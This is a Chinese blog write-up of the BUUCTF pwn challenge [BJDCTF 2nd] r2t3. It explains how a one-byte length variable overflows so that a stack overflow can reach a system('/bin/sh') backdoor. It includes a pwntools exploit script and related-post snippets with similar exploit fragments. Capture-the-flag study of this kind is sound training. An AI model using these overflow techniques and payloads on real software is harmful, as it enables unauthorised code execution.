[BUUCTF-pwn]——[BJDCTF 2nd]r2t3

最新推荐文章于 2023-11-25 10:42:48 发布
最新推荐文章于 2023-11-25 10:42:48 发布
阅读量158 收藏
点赞数
分类专栏: # BUUCTF # 整数溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/113781314
版权

[BUUCTF-pwn]——[BJDCTF 2nd]r2t3

  • 题目地址:https://buuoj.cn/challenges#[BJDCTF%202nd]r2t3
  • 题目:
    在这里插入图片描述
    先将文件下载下来,checksec一下。32位仅仅开启了NX保护。在这里插入图片描述
    在IDA中看看。有read函数但是长度限制导致无法栈溢出,点开下面一个函数看看.
    在这里插入图片描述
    里面有个strcpy函数,可以将其拷贝到dest里面. 并且0x11 + 0x4 + 0x4 << 0x400. 完美可以利用.但是字符串长度只能是 4~7. 上面v3是int8其实是一个字节. 我们可以利用最简单的整数溢出,来做 0x100 对应 0 。那么 0x104对应就是4,0x107对应就是7。
    在这里插入图片描述
    再看看其他函数,竟然发现了system("/bin/sh")。看来这个题目主要考验的就是整数溢出和栈溢出了
    在这里插入图片描述
    在这里插入图片描述

exploit

from pwn import *
p=remote('node3.buuoj.cn',xxxx)
sys_addr = 0x08048594  #我比较喜欢压参数的位置.因为即使调用的函数有验证也可以绕过去.
p.recvuntil("name:")
payload=(0x11+0x4)*'a'+p32(sys_addr)
payload=payload.ljust(0x105,'a')
p.sendline(payload)
p.interactive()
Y-peak
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
[BUUCTF]PWN12——[BJDCTF 2nd]r2t3
mcmuyanga的博客
08-29 457
[BUUCTF]PWN12——[BJDCTF 2nd]r2t3 题目网址:https://buuoj.cn/challenges#[BJDCTF%202nd]r2t3 步骤: 例行检查,32位,开启了NX保护 nc一下看看程序的大概执行情况 32位ida载入,shift+f12查看程序里的字符串,看到了system函数和 ‘/bin/sh’ 字符串 双击跟进,ctrl+x找到调用改字符串的函数,找到了程序里的一个后门函数,shell_addr=0x804858B 根据nc得到的提示字符串,找到输
buuoj BJDCTF 2nd r2t3
pondzhang的专栏
03-26 699
buf定义长度为0x400。而buf的长度为0x408 所以不存在溢出。 可见name_check函数存在安全漏洞,但是要绕过长度限制。unsigned __int8 v3定义的数据类型实际为unsigned char。仅有1个字节,超过1个字节数据丢弃,也就是最大数值为0xff ,也就是0x100=256=0,那么可以用0x104至0x107来满足上面的条件。即为传说中的整形溢出...
[BUUCTF]PWN------[BJDCTF 2nd]r2t3
BangSen1的博客
01-19 179
[BJDCTF 2nd]r2t3 例行检查,32bit,开启NX保护 nc 一下,没有有用的信息 用IDA打开,注意到了/bin/sh,继续跟进 找到了这个后门函数,shell_addr=-0x084858B,再去查看主函数 我们可以看到,buf的大小是0x408,但限制读取0x400,所以不存在溢出, 再看name_check函数,它对我们的长度进行了规定,要在4~7之间,但它负责接收buf的变量v3是unsigned_int8型的,即无符号整形。因此可以表示的范围为0–2^8-1(255) b
buuctf r2t3
carol2358的博客
04-14 250
整数溢出 ida: 漏洞在name_check里,unsigned_int8相当于char,一个字节,最大数值为0xff(255),0xff+1=0x100(256), 所以我们只要输入在0x104到0x108之间的都可以,换成十进制就是260到264 本题本地打不通,但远端是可以打通的 from pwn import * from LibcSearcher import * conte...
[BJDCTF 2nd]r2t3
、moddemod
06-11 343
exp from pwn import * context.log_level = 'debug' proc_name = './r2t3' # sh = remote('node3.buuoj.cn', 28627) # sh = process(proc_name) elf = ELF(proc_name) system_addr = elf.plt['system'] main_addr = elf.sym['main'] bin_sh_addr = 0x08048760 # n = 0...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
BJDCTF_r2t3
weixin_44864859的博客
04-09 361
BJDCTF_r2t3 考点:考点:短整型溢出 1.首先检查程序的基础信息 32位程序,可以看到这开启了NX保护,说明无法在栈上执行shellcode 2.运行程序,对程序功能有基本了解 程序基本功能:输入name,对name长度进行判断 3.用ida打开进行分析 这里截取了关键部分对代码 首先在main函数中,没有任何可疑的 进入name_check函数:接受了一个最大长度为0x400的b...
CTF-Pwn-[BJDCTF 2nd] r2t3
归子莫的博客
05-06 697
CTF-Pwn-[BJDCTF 2nd] r2t3 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Pwn类,[BJDCTF 2nd] r2t3 下载题目的文件 R2t3 思路 使用file命令查看,发...
BUUCTF-PWN刷题日记(一)
weixin_45461609的博客
04-30 1279
BUUCTF-PWN刷题日记rip rip 简单的栈溢出 #coding=utf-8 from pwn import* #r = process('./pwn1') r = remote('node3.buuoj.cn',26123) sys_addr = 0x401186 #address of fun payload = 'a'*(0xf+8) + p64(sys_addr) r.sendli...
BJDCTF 2nd pwn Writeup
starssgo的博客
03-23 3117
博客地址 没做完…没出的题复现了补上去… r2t3 整数溢出,还是比较简单的 # -*- coding: utf-8 -* from pwn import * from LibcSearcher import * context.log_level = 'debug' context.arch = 'amd64' elf = ELF('r2t3') p = 0 def pwn(ip,port,de...
BUUctf-WEB-Havefun
qq_63301612的博客
11-29 605
BUUctf-WEB-Havefun的简单教程
BUUCTF:N种方法解决 (ctf夺旗)
h_yperion的博客
05-23 2043
题目N种解决方式地址:https://buuoj.cn/challenges#N%E7%A7%8D%E6%96%B9%E6%B3%95%E8%A7%A3%E5%86%B3 1.找到题目,下载文件解压缩发现是.exe结尾,用记事本或者编辑器打开 2.发现熟悉的img标签 3.复制整段到浏览器URL中打开,得到一个二维码 4.扫描得到(手机扫描 也可以哈哈) 5.输入到flag中,提交完成! ...
CTF题之BUUCTF系列:BUUCTF Misc 你竟然赶我走
一只小蜜蜂的博客
07-31 3351
一、名称 BUUCTF Misc 你竟然赶我走 二、题目链接:https://buuoj.cn/challenges 解压缩后是一个jpg文件 打开图片如下: 三、解题步骤1、方法一: 使用winhex工具打开biubiu.jpg文件,查看一下内部结构 文档最后面显示出了flag值为 flag{stego_is_s0_bor1ing} 2、方法二: 使用StegSolve工具打开,Analyse--File Format--获得右图结果 文档左下角显示出flag值为...
BUUCTF [GXYCTF2019]gakki 1
最新发布
YueXuan_521的博客
11-25 1万+
BUUCTF [GXYCTF2019]gakki 1
BJDCTF 2nd - Pwnr2t3、one_gadget、r2t4)
像初雪一样自由洒落
03-25 603
r2t3 最简单的一道题,可是我竟然没有做出来,无语了,,, 文件保护没啥好说的,,,很正常 进入name_check函数 255 ==> 255 256 ==> 0,257 ==> 1,258 ==> 2,259 ==> 3, 260 ==> 4,261 ==> 5,262 ==> 6,263 ==> 7,264 ==...
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值